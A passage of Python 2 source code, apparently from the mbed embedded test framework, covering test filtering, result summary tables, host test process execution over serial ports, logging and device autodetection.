# When users are using 'build only flag' and test do not have
# specified peripherals we can allow test building by default
pass
elif self.opts_peripheral_by_names and test_id not in self.opts_peripheral_by_names:
# If we force peripheral with option -p we expect test
# to pass even if peripheral is not in MUTs file.
pass
elif not self.is_peripherals_available(target, test.peripherals):
if self.opts_verbose_skipped_tests:
if test.peripherals:
print self.logger.log_line(self.logger.LogType.INFO, 'Peripheral %s test skipped for target %s'% (",".join(test.peripherals), target))
else:
print self.logger.log_line(self.logger.LogType.INFO, 'Test %s skipped for target %s'% (test_id, target))
continue
# The test has made it through all the filters, so add it to the valid tests list
valid_test_map_keys.append(test_id)
return valid_test_map_keys
def get_skipped_tests(self, all_test_map_keys, valid_test_map_keys):
# NOTE: This will not preserve order
return list(set(all_test_map_keys) - set(valid_test_map_keys))
def generate_test_summary_by_target(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows text x toolchain test result matrix
"""
RESULT_INDEX = 0
TARGET_INDEX = 1
TOOLCHAIN_INDEX = 2
TEST_INDEX = 3
DESC_INDEX = 4
unique_targets = get_unique_value_from_summary(test_summary, TARGET_INDEX)
unique_tests = get_unique_value_from_summary(test_summary, TEST_INDEX)
unique_test_desc = get_unique_value_from_summary_ext(test_summary, TEST_INDEX, DESC_INDEX)
unique_toolchains = get_unique_value_from_summary(test_summary, TOOLCHAIN_INDEX)
result = "Test summary:\n"
for target in unique_targets:
result_dict = {} # test : { toolchain : result }
unique_target_toolchains = []
for test in test_summary:
if test[TARGET_INDEX] == target:
if test[TOOLCHAIN_INDEX] not in unique_target_toolchains:
unique_target_toolchains.append(test[TOOLCHAIN_INDEX])
if test[TEST_INDEX] not in result_dict:
result_dict[test[TEST_INDEX]] = {}
result_dict[test[TEST_INDEX]][test[TOOLCHAIN_INDEX]] = test[RESULT_INDEX]
pt_cols = ["Target", "Test ID", "Test Description"] + unique_target_toolchains
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
pt.padding_width = 1 # One space between column edges and contents (default)
for test in unique_tests:
if test in result_dict:
test_results = result_dict[test]
if test in unique_test_desc:
row = [target, test, unique_test_desc[test]]
for toolchain in unique_toolchains:
if toolchain in test_results:
row.append(test_results[toolchain])
pt.add_row(row)
result += pt.get_string()
shuffle_seed_text = "Shuffle Seed: %.*f"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def generate_test_summary(self, test_summary, shuffle_seed=None):
""" Prints well-formed summary with results (SQL table like)
table shows target x test results matrix across
"""
success_code = 0 # Success code that can be leter returned to
result = "Test summary:\n"
# Pretty table package is used to print results
pt = PrettyTable(["Result", "Target", "Toolchain", "Test ID", "Test Description",
"Elapsed Time (sec)", "Timeout (sec)", "Loops"])
pt.align["Result"] = "l" # Left align
pt.align["Target"] = "l" # Left align
pt.align["Toolchain"] = "l" # Left align
pt.align["Test ID"] = "l" # Left align
pt.align["Test Description"] = "l" # Left align
pt.padding_width = 1 # One space between column edges and contents (default)
result_dict = {self.TEST_RESULT_OK : 0,
self.TEST_RESULT_FAIL : 0,
self.TEST_RESULT_ERROR : 0,
self.TEST_RESULT_UNDEF : 0,
self.TEST_RESULT_IOERR_COPY : 0,
self.TEST_RESULT_IOERR_DISK : 0,
self.TEST_RESULT_IOERR_SERIAL : 0,
self.TEST_RESULT_NO_IMAGE : 0,
self.TEST_RESULT_TIMEOUT : 0,
self.TEST_RESULT_MBED_ASSERT : 0,
self.TEST_RESULT_BUILD_FAILED : 0,
self.TEST_RESULT_NOT_SUPPORTED : 0
}
for test in test_summary:
if test[0] in result_dict:
result_dict[test[0]] += 1
pt.add_row(test)
result += pt.get_string()
result += "\n"
# Print result count
result += "Result: " + ' / '.join(['%s %s' % (value, key) for (key, value) in {k: v for k, v in result_dict.items() if v != 0}.iteritems()])
shuffle_seed_text = "Shuffle Seed: %.*f\n"% (self.SHUFFLE_SEED_ROUND,
shuffle_seed if shuffle_seed else self.shuffle_random_seed)
result += "\n%s"% (shuffle_seed_text if self.opts_shuffle_test_order else '')
return result
def test_loop_list_to_dict(self, test_loops_str):
""" Transforms test_id=X,test_id=X,test_id=X into dictionary {test_id : test_id_loops_count}
"""
result = {}
if test_loops_str:
test_loops = test_loops_str
for test_loop in test_loops:
test_loop_count = test_loop.split('=')
if len(test_loop_count) == 2:
_test_id, _test_loops = test_loop_count
try:
_test_loops = int(_test_loops)
except:
continue
result[_test_id] = _test_loops
return result
def get_test_loop_count(self, test_id):
""" This function returns no. of loops per test (deducted by test_id_.
If test is not in list of redefined loop counts it will use default value.
"""
result = self.GLOBAL_LOOPS_COUNT
if test_id in self.TEST_LOOPS_DICT:
result = self.TEST_LOOPS_DICT[test_id]
return result
def delete_file(self, file_path):
""" Remove file from the system
"""
result = True
resutl_msg = ""
try:
os.remove(file_path)
except Exception, e:
resutl_msg = e
result = False
return result, resutl_msg
def handle_mut(self, mut, data, target_name, toolchain_name, test_loops=1):
""" Test is being invoked for given MUT.
"""
# Get test information, image and test timeout
test_id = data['test_id']
test = TEST_MAP[test_id]
test_description = TEST_MAP[test_id].get_description()
image = data["image"]
duration = data.get("duration", 10)
if mut is None:
print "Error: No Mbed available: MUT[%s]" % data['mcu']
return None
mcu = mut['mcu']
copy_method = mut.get('copy_method') # Available board configuration selection e.g. core selection etc.
if self.db_logger:
self.db_logger.reconnect()
selected_copy_method = self.opts_copy_method if copy_method is None else copy_method
# Tests can be looped so test results must be stored for the same test
test_all_result = []
# Test results for one test ran few times
detailed_test_results = {} # { Loop_number: { results ... } }
for test_index in range(test_loops):
# If mbedls is available and we are auto detecting MUT info,
# update MUT info (mounting may changed)
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
platform_name_filter = [mcu]
muts_list = {}
found = False
for i in range(0, 60):
print('Looking for %s with MBEDLS' % mcu)
muts_list = get_autodetected_MUTS_list(platform_name_filter=platform_name_filter)
if 1 not in muts_list:
sleep(3)
else:
found = True
break
if not found:
print "Error: mbed not found with MBEDLS: %s" % data['mcu']
return None
else:
mut = muts_list[1]
disk = mut.get('disk')
port = mut.get('port')
if disk is None or port is None:
return None
target_by_mcu = TARGET_MAP[mut['mcu']]
target_name_unique = mut['mcu_unique'] if 'mcu_unique' in mut else mut['mcu']
# Some extra stuff can be declared in MUTs structure
reset_type = mut.get('reset_type') # reboot.txt, reset.txt, shutdown.txt
reset_tout = mut.get('reset_tout') # COPY_IMAGE -> RESET_PROC -> SLEEP(RESET_TOUT)
# When the build and test system were separate, this was relative to a
# base network folder base path: join(NETWORK_BASE_PATH, )
image_path = image
# Host test execution
start_host_exec_time = time()
single_test_result = self.TEST_RESULT_UNDEF # single test run result
_copy_method = selected_copy_method
if not exists(image_path):
single_test_result = self.TEST_RESULT_NO_IMAGE
elapsed_time = 0
single_test_output = self.logger.log_line(self.logger.LogType.ERROR, 'Image file does not exist: %s'% image_path)
print single_test_output
else:
# Host test execution
start_host_exec_time = time()
host_test_verbose = self.opts_verbose_test_result_only or self.opts_verbose
host_test_reset = self.opts_mut_reset_type if reset_type is None else reset_type
host_test_result = self.run_host_test(test.host_test,
image_path, disk, port, duration,
micro=target_name,
verbose=host_test_verbose,
reset=host_test_reset,
reset_tout=reset_tout,
copy_method=selected_copy_method,
program_cycle_s=target_by_mcu.program_cycle_s)
single_test_result, single_test_output, single_testduration, single_timeout = host_test_result
# Store test result
test_all_result.append(single_test_result)
total_elapsed_time = time() - start_host_exec_time # Test time with copy (flashing) / reset
elapsed_time = single_testduration # TIme of single test case execution after reset
detailed_test_results[test_index] = {
'result' : single_test_result,
'output' : single_test_output,
'target_name' : target_name,
'target_name_unique' : target_name_unique,
'toolchain_name' : toolchain_name,
'id' : test_id,
'description' : test_description,
'elapsed_time' : round(elapsed_time, 2),
'duration' : single_timeout,
'copy_method' : _copy_method,
}
print self.print_test_result(single_test_result, target_name_unique, toolchain_name,
test_id, test_description, elapsed_time, single_timeout)
# Update database entries for ongoing test
if self.db_logger and self.db_logger.is_connected():
test_type = 'SingleTest'
self.db_logger.insert_test_entry(self.db_logger_build_id,
target_name,
toolchain_name,
test_type,
test_id,
single_test_result,
single_test_output,
elapsed_time,
single_timeout,
test_index)
# If we perform waterfall test we test until we get OK and we stop testing
if self.opts_waterfall_test and single_test_result == self.TEST_RESULT_OK:
break
if self.db_logger:
self.db_logger.disconnect()
return (self.shape_global_test_loop_result(test_all_result, self.opts_waterfall_test and self.opts_consolidate_waterfall_test),
target_name_unique,
toolchain_name,
test_id,
test_description,
round(elapsed_time, 2),
single_timeout,
self.shape_test_loop_ok_result_count(test_all_result)), detailed_test_results
def handle(self, test_spec, target_name, toolchain_name, test_loops=1):
""" Function determines MUT's mbed disk/port and copies binary to
target.
"""
handle_results = []
data = json.loads(test_spec)
# Find a suitable MUT:
mut = None
for id, m in self.muts.iteritems():
if m['mcu'] == data['mcu']:
mut = m
handle_result = self.handle_mut(mut, data, target_name, toolchain_name, test_loops=test_loops)
handle_results.append(handle_result)
return handle_results
def print_test_result(self, test_result, target_name, toolchain_name,
test_id, test_description, elapsed_time, duration):
""" Use specific convention to print test result and related data
"""
tokens = []
tokens.append("TargetTest")
tokens.append(target_name)
tokens.append(toolchain_name)
tokens.append(test_id)
tokens.append(test_description)
separator = "::"
time_info = " in %.2f of %d sec" % (round(elapsed_time, 2), duration)
result = separator.join(tokens) + " [" + test_result +"]" + time_info
return Fore.MAGENTA + result + Fore.RESET
def shape_test_loop_ok_result_count(self, test_all_result):
""" Reformats list of results to simple string
"""
test_loop_count = len(test_all_result)
test_loop_ok_result = test_all_result.count(self.TEST_RESULT_OK)
return "%d/%d"% (test_loop_ok_result, test_loop_count)
def shape_global_test_loop_result(self, test_all_result, waterfall_and_consolidate):
""" Reformats list of results to simple string
"""
result = self.TEST_RESULT_FAIL
if all(test_all_result[0] == res for res in test_all_result):
result = test_all_result[0]
elif waterfall_and_consolidate and any(res == self.TEST_RESULT_OK for res in test_all_result):
result = self.TEST_RESULT_OK
return result
def run_host_test(self, name, image_path, disk, port, duration,
micro=None, reset=None, reset_tout=None,
verbose=False, copy_method=None, program_cycle_s=None):
""" Function creates new process with host test configured with particular test case.
Function also is pooling for serial port activity from process to catch all data
printed by test runner and host test during test execution
"""
def get_char_from_queue(obs):
""" Get character from queue safe way
"""
try:
c = obs.queue.get(block=True, timeout=0.5)
except Empty, _:
c = None
return c
def filter_queue_char(c):
""" Filters out non ASCII characters from serial port
"""
if ord(c) not in range(128):
c = ' '
return c
def get_test_result(output):
""" Parse test 'output' data
"""
result = self.TEST_RESULT_TIMEOUT
for line in "".join(output).splitlines():
search_result = self.RE_DETECT_TESTCASE_RESULT.search(line)
if search_result and len(search_result.groups()):
result = self.TEST_RESULT_MAPPING[search_result.groups(0)[0]]
break
return result
def get_auto_property_value(property_name, line):
""" Scans auto detection line from MUT and returns scanned parameter 'property_name'
Returns string
"""
result = None
if re.search("HOST: Property '%s'"% property_name, line) is not None:
property = re.search("HOST: Property '%s' = '([\w\d _]+)'"% property_name, line)
if property is not None and len(property.groups()) == 1:
result = property.groups()[0]
return result
# print "{%s} port:%s disk:%s" % (name, port, disk),
cmd = ["python",
'%s.py'% name,
'-d', disk,
'-f', '"%s"'% image_path,
'-p', port,
'-t', str(duration),
'-C', str(program_cycle_s)]
if get_module_avail('mbed_lstools') and self.opts_auto_detect:
cmd += ['--auto']
# Add extra parameters to host_test
if copy_method is not None:
cmd += ["-c", copy_method]
if micro is not None:
cmd += ["-m", micro]
if reset is not None:
cmd += ["-r", reset]
if reset_tout is not None:
cmd += ["-R", str(reset_tout)]
if verbose:
print Fore.MAGENTA + "Executing '" + " ".join(cmd) + "'" + Fore.RESET
print "Test::Output::Start"
proc = Popen(cmd, stdout=PIPE, cwd=HOST_TESTS)
obs = ProcessObserver(proc)
update_once_flag = {} # Stores flags checking if some auto-parameter was already set
line = ''
output = []
start_time = time()
while (time() - start_time) < (2 * duration):
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
# Give the mbed under test a way to communicate the end of the test
if c in ['\n', '\r']:
# Checking for auto-detection information from the test about MUT reset moment
if 'reset_target' not in update_once_flag and "HOST: Reset target..." in line:
# We will update this marker only once to prevent multiple time resets
update_once_flag['reset_target'] = True
start_time = time()
# Checking for auto-detection information from the test about timeout
auto_timeout_val = get_auto_property_value('timeout', line)
if 'timeout' not in update_once_flag and auto_timeout_val is not None:
# We will update this marker only once to prevent multiple time resets
update_once_flag['timeout'] = True
duration = int(auto_timeout_val)
# Detect mbed assert:
if 'mbed assertation failed: ' in line:
output.append('{{mbed_assert}}')
break
# Check for test end
if '{end}' in line:
break
line = ''
else:
line += c
end_time = time()
testcase_duration = end_time - start_time # Test case duration from reset to {end}
c = get_char_from_queue(obs)
if c:
if verbose:
sys.stdout.write(c)
c = filter_queue_char(c)
output.append(c)
if verbose:
print "Test::Output::Finish"
# Stop test process
obs.stop()
result = get_test_result(output)
return (result, "".join(output), testcase_duration, duration)
def is_peripherals_available(self, target_mcu_name, peripherals=None):
""" Checks if specified target should run specific peripheral test case defined in MUTs file
"""
if peripherals is not None:
peripherals = set(peripherals)
for id, mut in self.muts.iteritems():
# Target MCU name check
if mut["mcu"] != target_mcu_name:
continue
# Peripherals check
if peripherals is not None:
if 'peripherals' not in mut:
continue
if not peripherals.issubset(set(mut['peripherals'])):
continue
return True
return False
def shape_test_request(self, mcu, image_path, test_id, duration=10):
""" Function prepares JSON structure describing test specification
"""
test_spec = {
"mcu": mcu,
"image": image_path,
"duration": duration,
"test_id": test_id,
}
return json.dumps(test_spec)
def get_unique_value_from_summary(test_summary, index):
""" Gets list of unique target names
"""
result = []
for test in test_summary:
target_name = test[index]
if target_name not in result:
result.append(target_name)
return sorted(result)
def get_unique_value_from_summary_ext(test_summary, index_key, index_val):
""" Gets list of unique target names and return dictionary
"""
result = {}
for test in test_summary:
key = test[index_key]
val = test[index_val]
if key not in result:
result[key] = val
return result
def show_json_file_format_error(json_spec_filename, line, column):
""" Prints JSON broken content
"""
with open(json_spec_filename) as data_file:
line_no = 1
for json_line in data_file:
if line_no + 5 >= line: # Print last few lines before error
print 'Line %d:\t'%line_no + json_line, # Prints line
if line_no == line:
print ' ' * len('Line %d:'%line_no) + '\t', '-' * (column-1) + '^'
break
line_no += 1
def json_format_error_defect_pos(json_error_msg):
""" Gets first error line and column in JSON file format.
Parsed from exception thrown by json.loads() string
"""
result = None
line, column = 0, 0
# Line value search
line_search = re.search('line [0-9]+', json_error_msg)
if line_search is not None:
ls = line_search.group().split(' ')
if len(ls) == 2:
line = int(ls[1])
# Column position search
column_search = re.search('column [0-9]+', json_error_msg)
if column_search is not None:
cs = column_search.group().split(' ')
if len(cs) == 2:
column = int(cs[1])
result = [line, column]
return result
def get_json_data_from_file(json_spec_filename, verbose=False):
""" Loads from file JSON formatted string to data structure
"""
result = None
try:
with open(json_spec_filename) as data_file:
try:
result = json.load(data_file)
except ValueError as json_error_msg:
result = None
print 'JSON file %s parsing failed. Reason: %s' % (json_spec_filename, json_error_msg)
# We can print where error occurred inside JSON file if we can parse exception msg
json_format_defect_pos = json_format_error_defect_pos(str(json_error_msg))
if json_format_defect_pos is not None:
line = json_format_defect_pos[0]
column = json_format_defect_pos[1]
print
show_json_file_format_error(json_spec_filename, line, column)
except IOError as fileopen_error_msg:
print 'JSON file %s not opened. Reason: %s'% (json_spec_filename, fileopen_error_msg)
print
if verbose and result:
pp = pprint.PrettyPrinter(indent=4)
pp.pprint(result)
return result
def print_muts_configuration_from_json(json_data, join_delim=", ", platform_filter=None):
""" Prints MUTs configuration passed to test script for verboseness
"""
muts_info_cols = []
# We need to check all unique properties for each defined MUT
for k in json_data:
mut_info = json_data[k]
for mut_property in mut_info:
if mut_property not in muts_info_cols:
muts_info_cols.append(mut_property)
# Prepare pretty table object to display all MUTs
pt_cols = ["index"] + muts_info_cols
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# Add rows to pretty print object
for k in json_data:
row = [k]
mut_info = json_data[k]
add_row = True
if platform_filter and 'mcu' in mut_info:
add_row = re.search(platform_filter, mut_info['mcu']) is not None
if add_row:
for col in muts_info_cols:
cell_val = mut_info[col] if col in mut_info else None
if type(cell_val) == ListType:
cell_val = join_delim.join(cell_val)
row.append(cell_val)
pt.add_row(row)
return pt.get_string()
def print_test_configuration_from_json(json_data, join_delim=", "):
""" Prints test specification configuration passed to test script for verboseness
"""
toolchains_info_cols = []
# We need to check all toolchains for each device
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
toolchains = targets[target]
for toolchain in toolchains:
if toolchain not in toolchains_info_cols:
toolchains_info_cols.append(toolchain)
# Prepare pretty table object to display test specification
pt_cols = ["mcu"] + sorted(toolchains_info_cols)
pt = PrettyTable(pt_cols)
for col in pt_cols:
pt.align[col] = "l"
# { target : [conflicted toolchains] }
toolchain_conflicts = {}
toolchain_path_conflicts = []
for k in json_data:
# k should be 'targets'
targets = json_data[k]
for target in targets:
target_supported_toolchains = get_target_supported_toolchains(target)
if not target_supported_toolchains:
target_supported_toolchains = []
target_name = target if target in TARGET_MAP else "%s*"% target
row = [target_name]
toolchains = targets[target]
for toolchain in sorted(toolchains_info_cols):
# Check for conflicts: target vs toolchain
conflict = False
conflict_path = False
if toolchain in toolchains:
if toolchain not in target_supported_toolchains:
conflict = True
if target not in toolchain_conflicts:
toolchain_conflicts[target] = []
toolchain_conflicts[target].append(toolchain)
# Add marker inside table about target usage / conflict
cell_val = 'Yes' if toolchain in toolchains else '-'
if conflict:
cell_val += '*'
# Check for conflicts: toolchain vs toolchain path
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
conflict_path = True
if toolchain not in toolchain_path_conflicts:
toolchain_path_conflicts.append(toolchain)
if conflict_path:
cell_val += '#'
row.append(cell_val)
pt.add_row(row)
# generate result string
result = pt.get_string() # Test specification table
if toolchain_conflicts or toolchain_path_conflicts:
result += "\n"
result += "Toolchain conflicts:\n"
for target in toolchain_conflicts:
if target not in TARGET_MAP:
result += "\t* Target %s unknown\n"% (target)
conflict_target_list = join_delim.join(toolchain_conflicts[target])
sufix = 's' if len(toolchain_conflicts[target]) > 1 else ''
result += "\t* Target %s does not support %s toolchain%s\n"% (target, conflict_target_list, sufix)
for toolchain in toolchain_path_conflicts:
# Let's check toolchain configuration
if toolchain in TOOLCHAIN_PATHS:
toolchain_path = TOOLCHAIN_PATHS[toolchain]
if not os.path.isdir(toolchain_path):
result += "\t# Toolchain %s path not found: %s\n"% (toolchain, toolchain_path)
return result
def get_avail_tests_summary_table(cols=None, result_summary=True, join_delim=',',platform_filter=None):
""" Generates table summary with all test cases and additional test cases
information using pretty print functionality. Allows test suite user to
see test cases
"""
# get all unique test ID prefixes
unique_test_id = []
for test in TESTS:
split = test['id'].split('_')[:-1]
test_id_prefix = '_'.join(split)
if test_id_prefix not in unique_test_id:
unique_test_id.append(test_id_prefix)
unique_test_id.sort()
counter_dict_test_id_types = dict((t, 0) for t in unique_test_id)
counter_dict_test_id_types_all = dict((t, 0) for t in unique_test_id)
test_properties = ['id',
'automated',
'description',
'peripherals',
'host_test',
'duration'] if cols is None else cols
# All tests status table print
pt = PrettyTable(test_properties)
for col in test_properties:
pt.align[col] = "l"
pt.align['duration'] = "r"
counter_all = 0
counter_automated = 0
pt.padding_width = 1 # One space between column edges and contents (default)
for test_id in sorted(TEST_MAP.keys()):
if platform_filter is not None:
# FIlter out platforms using regex
if re.search(platform_filter, test_id) is None:
continue
row = []
test = TEST_MAP[test_id]
split = test_id.split('_')[:-1]
test_id_prefix = '_'.join(split)
for col in test_properties:
col_value = test[col]
if type(test[col]) == ListType:
col_value = join_delim.join(test[col])
elif test[col] == None:
col_value = "-"
row.append(col_value)
if test['automated'] == True:
counter_dict_test_id_types[test_id_prefix] += 1
counter_automated += 1
pt.add_row(row)
# Update counters
counter_all += 1
counter_dict_test_id_types_all[test_id_prefix] += 1
result = pt.get_string()
result += "\n\n"
if result_summary and not platform_filter:
# Automation result summary
test_id_cols = ['automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
percent_progress = round(100.0 * counter_automated / float(counter_all), 1)
str_progress = progress_bar(percent_progress, 75)
pt.add_row([counter_automated, counter_all, percent_progress, str_progress])
result += "Automation coverage:\n"
result += pt.get_string()
result += "\n\n"
# Test automation coverage table print
test_id_cols = ['id', 'automated', 'all', 'percent [%]', 'progress']
pt = PrettyTable(test_id_cols)
pt.align['id'] = "l"
pt.align['automated'] = "r"
pt.align['all'] = "r"
pt.align['percent [%]'] = "r"
for unique_id in unique_test_id:
# print "\t\t%s: %d / %d" % (unique_id, counter_dict_test_id_types[unique_id], counter_dict_test_id_types_all[unique_id])
percent_progress = round(100.0 * counter_dict_test_id_types[unique_id] / float(counter_dict_test_id_types_all[unique_id]), 1)
str_progress = progress_bar(percent_progress, 75)
row = [unique_id,
counter_dict_test_id_types[unique_id],
counter_dict_test_id_types_all[unique_id],
percent_progress,
"[" + str_progress + "]"]
pt.add_row(row)
result += "Test automation coverage:\n"
result += pt.get_string()
result += "\n\n"
return result
def progress_bar(percent_progress, saturation=0):
""" This function creates progress bar with optional simple saturation mark
"""
step = int(percent_progress / 2) # Scale by to (scale: 1 - 50)
str_progress = '#' * step + '.' * int(50 - step)
c = '!' if str_progress[38] == '.' else '|'
if saturation > 0:
saturation = saturation / 2
str_progress = str_progress[:saturation] + c + str_progress[saturation:]
return str_progress
def singletest_in_cli_mode(single_test):
""" Runs SingleTestRunner object in CLI (Command line interface) mode
@return returns success code (0 == success) for building and running tests
"""
start = time()
# Execute tests depending on options and filter applied
test_summary, shuffle_seed, test_summary_ext, test_suite_properties_ext, build_report, build_properties = single_test.execute()
elapsed_time = time() - start
# Human readable summary
if not single_test.opts_suppress_summary:
# prints well-formed summary with results (SQL table like)
print single_test.generate_test_summary(test_summary, shuffle_seed)
if single_test.opts_test_x_toolchain_summary:
# prints well-formed summary with results (SQL table like)
# table shows text x toolchain test result matrix
print single_test.generate_test_summary_by_target(test_summary, shuffle_seed)
print "Completed in %.2f sec"% (elapsed_time)
print
# Write summary of the builds
print_report_exporter = ReportExporter(ResultExporterType.PRINT, package="build")
status = print_report_exporter.report(build_report)
# Store extra reports in files
if single_test.opts_report_html_file_name:
# Export results in form of HTML report to separate file
report_exporter = ReportExporter(ResultExporterType.HTML)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_html_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_junit_file_name:
# Export results in form of JUnit XML report to separate file
report_exporter = ReportExporter(ResultExporterType.JUNIT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_junit_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_text_file_name:
# Export results in form of a text file
report_exporter = ReportExporter(ResultExporterType.TEXT)
report_exporter.report_to_file(test_summary_ext, single_test.opts_report_text_file_name, test_suite_properties=test_suite_properties_ext)
if single_test.opts_report_build_file_name:
# Export build results as html report to sparate file
report_exporter = ReportExporter(ResultExporterType.JUNIT, package="build")
report_exporter.report_to_file(build_report, single_test.opts_report_build_file_name, test_suite_properties=build_properties)
# Returns True if no build failures of the test projects or their dependencies
return status
class TestLogger():
""" Super-class for logging and printing ongoing events for test suite pass
"""
def __init__(self, store_log=True):
""" We can control if logger actually stores log in memory
or just handled all log entries immediately
"""
self.log = []
self.log_to_file = False
self.log_file_name = None
self.store_log = store_log
self.LogType = construct_enum(INFO='Info',
WARN='Warning',
NOTIF='Notification',
ERROR='Error',
EXCEPT='Exception')
self.LogToFileAttr = construct_enum(CREATE=1, # Create or overwrite existing log file
APPEND=2) # Append to existing log file
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Log one line of text
"""
log_timestamp = time()
log_entry = {'log_type' : LogType,
'log_timestamp' : log_timestamp,
'log_line' : log_line,
'_future' : None
}
# Store log in memory
if self.store_log:
self.log.append(log_entry)
return log_entry
class CLITestLogger(TestLogger):
""" Logger used with CLI (Command line interface) test suite. Logs on screen and to file if needed
"""
def __init__(self, store_log=True, file_name=None):
TestLogger.__init__(self)
self.log_file_name = file_name
#self.TIMESTAMP_FORMAT = '%y-%m-%d %H:%M:%S' # Full date and time
self.TIMESTAMP_FORMAT = '%H:%M:%S' # Time only
def log_print(self, log_entry, timestamp=True):
""" Prints on screen formatted log entry
"""
ts = log_entry['log_timestamp']
timestamp_str = datetime.datetime.fromtimestamp(ts).strftime("[%s] "% self.TIMESTAMP_FORMAT) if timestamp else ''
log_line_str = "%(log_type)s: %(log_line)s"% (log_entry)
return timestamp_str + log_line_str
def log_line(self, LogType, log_line, timestamp=True, line_delim='\n'):
""" Logs line, if log file output was specified log line will be appended
at the end of log file
"""
log_entry = TestLogger.log_line(self, LogType, log_line)
log_line_str = self.log_print(log_entry, timestamp)
if self.log_file_name is not None:
try:
with open(self.log_file_name, 'a') as f:
f.write(log_line_str + line_delim)
except IOError:
pass
return log_line_str
def factory_db_logger(db_url):
""" Factory database driver depending on database type supplied in database connection string db_url
"""
if db_url is not None:
from tools.test_mysql import MySQLDBAccess
connection_info = BaseDBAccess().parse_db_connection_string(db_url)
if connection_info is not None:
(db_type, username, password, host, db_name) = BaseDBAccess().parse_db_connection_string(db_url)
if db_type == 'mysql':
return MySQLDBAccess()
return None
def detect_database_verbose(db_url):
""" uses verbose mode (prints) database detection sequence to check it database connection string is valid
"""
result = BaseDBAccess().parse_db_connection_string(db_url)
if result is not None:
# Parsing passed
(db_type, username, password, host, db_name) = result
#print "DB type '%s', user name '%s', password '%s', host '%s', db name '%s'"% result
# Let's try to connect
db_ = factory_db_logger(db_url)
if db_ is not None:
print "Connecting to database '%s'..."% db_url,
db_.connect(host, username, password, db_name)
if db_.is_connected():
print "ok"
print "Detecting database..."
print db_.detect_database(verbose=True)
print "Disconnecting...",
db_.disconnect()
print "done"
else:
print "Database type '%s' unknown"% db_type
else:
print "Parse error: '%s' - DB Url error"% (db_url)
def get_module_avail(module_name):
""" This function returns True if module_name is already impored module
"""
return module_name in sys.modules.keys()
def get_autodetected_MUTS_list(platform_name_filter=None):
oldError = None
if os.name == 'nt':
# Disable Windows error box temporarily
oldError = ctypes.windll.kernel32.SetErrorMode(1) #note that SEM_FAILCRITICALERRORS = 1
mbeds = mbed_lstools.create()
detect_muts_list = mbeds.list_mbeds()
if os.name == 'nt':
ctypes.windll.kernel32.SetErrorMode(oldError)
return get_autodetected_MUTS(detect_muts_list, platform_name_filter=platform_name_filter)
def get_autodetected_MUTS(mbeds_list, platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial MUTS file.
If function fails to auto-detect devices it will return empty dictionary.
if get_module_avail('mbed_lstools'):
mbeds = mbed_lstools.create()
mbeds_list = mbeds.list_mbeds()
@param mbeds_list list of mbeds captured from mbed_lstools
@param platform_name You can filter 'platform_name' with list of filtered targets from 'platform_name_filter'
"""
result = {} # Should be in muts_all.json format
# Align mbeds_list from mbed_lstools to MUT file format (JSON dictionary with muts)
# mbeds_list = [{'platform_name': 'NUCLEO_F302R8', 'mount_point': 'E:', 'target_id': '07050200623B61125D5EF72A', 'serial_port': u'COM34'}]
index = 1
for mut in mbeds_list:
# Filter the MUTS if a filter is specified
if platform_name_filter and not mut['platform_name'] in platform_name_filter:
continue
# For mcu_unique - we are assigning 'platform_name_unique' value from mbedls output (if its existing)
# if not we are creating our own unique value (last few chars from platform's target_id).
m = {'mcu': mut['platform_name'],
'mcu_unique' : mut['platform_name_unique'] if 'platform_name_unique' in mut else "%s[%s]" % (mut['platform_name'], mut['target_id'][-4:]),
'port': mut['serial_port'],
'disk': mut['mount_point'],
'peripherals': [] # No peripheral detection
}
if index not in result:
result[index] = {}
result[index] = m
index += 1
return result
def get_autodetected_TEST_SPEC(mbeds_list,
use_default_toolchain=True,
use_supported_toolchains=False,
toolchain_filter=None,
platform_name_filter=None):
""" Function detects all connected to host mbed-enabled devices and generates artificial test_spec file.
If function fails to auto-detect devices it will return empty 'targets' test_spec description.
use_default_toolchain - if True add default toolchain to test_spec
use_supported_toolchains - if True add all supported toolchains to test_spec
toolchain_filter - if [...list of toolchains...] add from all toolchains only those in filter to test_spec
"""
result = {'targets': {} }
for mut in mbeds_list:
mcu = mut['mcu']
if platform_name_filter is None or (platform_name_filter and mut['mcu'] in platform_name_filter):
if mcu in TARGET_MAP:
default_toolchain = TARGET_MAP[mcu].default_toolchain
supported_toolchains = TARGET_MAP[mcu].supported_toolchains
# Decide which toolchains should be added to test specification toolchain pool for each target
toolchains = []
if use_default_toolchain:
toolchains.append(default_toolchain)
if use_supported_toolchains:
toolchains += supported_toolchains
if toolchain_filter is not None:
all_toolchains = supported_toolchains + [default_toolchain]
for toolchain in toolchain_filter:
if toolchain in all_toolchains:
toolchains.append(toolchain)
result['targets'][mcu] = list(set(toolchains))
return result
def get_default_test_options_parser():
""" Get common test script options used by CLI, web services etc.
"""
parser = argparse.ArgumentParser()
parser.add_argument('-i', '--tests',
dest='test_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with test specification')
parser.add_argument('-M', '--MUTS',
dest='muts_spec_filename',
metavar="FILE",
type=argparse_filestring_type,
help='Points to file with MUTs specification (overwrites settings.py and private_settings.py)')
parser.add_argument("-j", "--jobs",
dest='jobs',
metavar="NUMBER",
type=int,
help="Define number of compilation jobs. Default value is 1")
if get_module_avail('mbed_lstools'):
# Additional features available when mbed_lstools is installed on host and imported
